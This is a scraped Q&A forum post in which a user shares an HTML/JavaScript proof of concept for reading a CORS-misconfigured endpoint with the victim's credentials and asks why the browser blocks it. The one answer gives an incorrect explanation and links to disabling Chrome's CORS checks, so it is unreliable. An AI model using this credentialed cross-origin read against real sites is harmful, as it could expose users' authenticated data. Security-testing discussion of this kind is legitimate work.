Cross-Origin request blocked while Access-Control-Allow-Origin:* still reflect in the response
Question
I found an endpoint that appears to be vulnerable to CORS misconfiguration and I tried this POC:
<html>
<body>
<div id="poc">
<button type="button" onclick="cors()"></button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("poc").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "https://somedomain.com/vulnerable/endpoint", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
Those headers are reflected in the response :
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
if the user is unauthenticated it returns 401 by default
why am I getting my request blocked?
1 answers
solution1
0 2021-11-02 16:40:33
If you are sending this from localhost, the client is running http.But it's requesting a https server.That's why it's showing the errors.However, you can disable CORS checking in chrome. https://alfilatov.com/posts/run-chrome-without-cors/
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.